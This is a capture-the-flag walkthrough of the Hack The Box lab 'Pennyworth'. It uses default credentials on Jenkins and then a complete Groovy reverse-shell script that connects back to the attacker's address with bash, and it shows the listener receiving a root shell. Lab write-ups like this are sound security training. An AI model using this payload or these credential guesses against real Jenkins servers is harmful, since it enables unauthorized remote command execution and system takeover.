HTB Pennyworth

We continue with another very easy HTB box.

$ nmap -p- 10.129.243.77 -sV --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 17:54 CEST
Nmap scan report for 10.129.243.77
Host is up (0.062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 9.4.39.v20210325

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.40 seconds

Here we have Jetty 9.4.39.v20210325 listening on port 8080, the only open TCP port.

Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations.

https://www.eclipse.org/jetty/

If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F

This is a Jenkins server.

Leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project.

https://www.jenkins.io

The error page at http://10.129.243.77:8080/oops reveals which Jenkins version the target is running.

Trying a few default Jenkins and otherwise weak credentials we quickly find the correct ones: root:password.

Looking around after logging in we discover the Manage Jenkins section and its Script Console, which runs arbitrary Groovy on the server and so lets us execute commands (it is also the answer to the task question about the Script Console).

Resources like https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6 give us an idea of how to get a reverse shell through the Groovy Script Console. The host must be our own tun0 address and the port must match the listener we start next.

// Groovy auto-imports java.net.* and java.io.*, so no import lines are needed.
String host="10.10.14.69";   // attacker (tun0) address
int port=1234;               // must match the nc listener below
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// Pump shell output to the socket and socket input to the shell until either side ends.
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};
p.destroy();s.close();

$ sudo nc -lnvp 1234

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.243.77.
Ncat: Connection from 10.129.243.77:54554.
whoami 
root

We got a reverse shell as root; now we can upgrade the tty with the usual commands.

script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset
(when asked "Terminal type?", answer xterm)
export TERM=xterm
export SHELL=bash
stty rows 51 columns 198

And get our flag:

root@pennyworth:~# cd /root
root@pennyworth:~# ls

flag.txt  snap

root@pennyworth:~# cat flag.txt

9cdfXXXXXXXXXXXXXXXXXXXXXXXXXXXX